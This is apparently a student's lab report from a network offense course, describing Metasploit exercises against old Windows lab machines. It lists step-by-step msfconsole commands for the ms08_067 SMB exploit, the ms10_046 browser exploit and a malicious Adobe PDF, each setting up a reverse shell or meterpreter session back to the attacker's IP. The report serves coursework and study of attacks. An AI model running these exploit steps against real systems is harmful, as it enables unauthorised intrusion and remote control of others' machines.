zoukankan      html  css  js  c++  java
  • 2018-2019-2 20165209 《网络对抗技术》Exp5:MSF基础应用

    2018-2019-2 20165209 《网络对抗技术》Exp5:MSF基础应用

    目录

    一、基础问题回答和实验内容

    1.基础问题回答

    用自己的话解释什么是exploit,payload,encode.

    exploit:漏洞攻击,一个exploit程序肯定会触发系统的一个或多个漏洞,进而程序直接获取到目标系统的部分或所有权限。

    payload:搞破坏的关键代码。

    encode:保证payload不出现特定字符,避免被查杀。

    实验内容

    • 任务一:一个主动攻击实践,如ms08_067。

    • 任务二: 一个针对浏览器的攻击,如ms11_050。

    • 任务三: 一个针对客户端的攻击,如Adobe。

    • 任务四: 成功应用任何一个辅助模块。

    返回目录

    二、攻击实例

    1.主动攻击实践,实现ms08_067

    靶机:Microsoft Windows 2000(192.168.1.218)
    payload : generic/shell_reverse_tcp

    实验步骤

    • 首先要把靶机和攻击者的连接方式都改为桥接!!

    • 输入msfconsole打开metasploit控制台

    • 输入use exploit/windows/smb/ms08_067_netapi 使用ms08_067漏洞攻击方式

    • 输入set payload generic/shell_reverse_tcp以shell反向tcp连接为有效载荷

    • 输入set RHOST 192.168.1.218ip为靶机的IP

    • 输入set LHOST 192.168.1.182ip为攻击者的IP

    • 输入set target 0设置目标,0为无差别攻击

    • 输入exploit开始攻击

    返回目录

    攻击浏览器实践,ms10_046漏洞攻击

    靶机:Microsoft Windows XP SP3(English)
    payload : windows/meterpreter/reverse_tcp

    实验步骤

    • 输入use exploit/windows/browser/ms10_046_shortcut_icon_dllloader使用浏览器漏洞
    • 输入set payload windows/meterpreter/reverse_tcp 选择反向链接载荷
    • 输入set SRVHOST 192.168.1.182设置服务器IP(攻击者IP)
    • 输入set LHOST 192.168.1.182设置攻击者IP
    • 输入exploit开始攻击

    • 在win xp sp3的浏览器中访问刚刚设置的服务器IPhttp://192.168.1.182弹出如下窗口

    • 同时攻击者会开始监听并与靶机建立连接。

    • 输入sessions查看有多少主机被反向链接到攻击者和靶机对应的序号。

    • 输入sessions -i 2控制靶机(-i后面的数即为靶机对应的序号)

    返回目录

    攻击客户端实践,实现Adobe

    靶机:Windows XP sp3(192.168.1.139)

    实验步骤

    • 输入use windows/fileformat/adobe_cooltype_sing使用漏洞
    • 输入set payload windows/meterpreter/reverse_tcp选择攻击载荷
    • 输入set LHOST 192.168.1.182 为攻击者IP
    • 输入set FILENAME 20165209.pdf设置生成pdf文件的文件名
    • 输入exploit 开始攻击

    • 将生成的20165209.pdf复制到Windows XP中
    • 输入back退出当前模块
    • 输入use exploit/multi/handler 进入监听模块
    • 输入set payload windows/meterpreter/reverse_tcp选择攻击载荷
    • 输入set LHOST 192.168.1.182为攻击者IP
    • 输入exploit开始攻击
    • 在靶机中打开20165209.pdf,攻击成功

    返回目录

    成功攻击一个辅助模块,实现网段扫描(唯一)

    靶机:

    实验步骤

    • 输入show auxiliary查看所有的辅助模块
    • 输入info scanner/steam/server_info查看模块信息,请求从服务器获取信息,扫描范围默认为10(从起始地址开始往后扫10个),端口固定为UDP端口27015。端口27015只是用作输入/输出的通信端口。

    • 输入use scanner/steam/server_info使用漏洞
    • 输入set RHOSTS 192.168.1.180为起始IP
    • 输入exploit开始攻击
      (果不其然,这个网段里木有服务器,sang~)

    返回目录

    三、实验中遇到的问题及解决方案

    1.armitage无法开启,出现错误提示如下图

    • 参考了一篇博客里面解释了很多,具体的操作如下

    1 输入 /etc/init.d/postgresql start 启动postgresql数据库;
    2 输入 msfdb init 初始化MSF数据库(关键步骤);
    3 输入 msfconsole 运行msfconsole;
    4 输入 db_status 在msf中查看数据库连接状态。

    • 在显示Connected to msf. Connection type: postgresql.之后,再次输入armitage即可开启成功。

    返回目录

    四、实验总结

    1.实验总结与体会

    实验最痛苦的就是明明和大家做的一样,但是我的就是无法攻击成功。通过实验掌握了msf的简单操作,始终牢记不懂就help,不知道是干什么的就info,看不懂就有道的宗旨,还是有些收获的,有些快乐。

    2.离实战还缺些什么技术

    觉得差的也不多,也就一个大神的距离吧。通过在网络上捕包反查IP,并且攻击。类似这种步骤中的功能,我目前只能在已知的情况下,进行强迫式攻击(就是硬生生让舍友拷一下)。

    返回目录

  • 相关阅读:
    洛谷 P2234 [HNOI2002]营业额统计
    洛谷p3146&p3147
    洛谷 p1439 最长公共子序列
    搜索
    一步一步分析Caliburn.Micro(二:绑定执行方法Message现学现卖之自定命令)
    一步一步分析Caliburn.Micro(一:绑定执行方法Message)
    整理的C# 字符串类
    不用ADOX.CatalogClass创建Access数据库文件
    取远程网页数据 WebClient,HttpWebRequest
    C# LinQ 与 ADO.NET
  • 原文地址:https://www.cnblogs.com/tutu233/p/10742078.html
Copyright © 2011-2022 走看看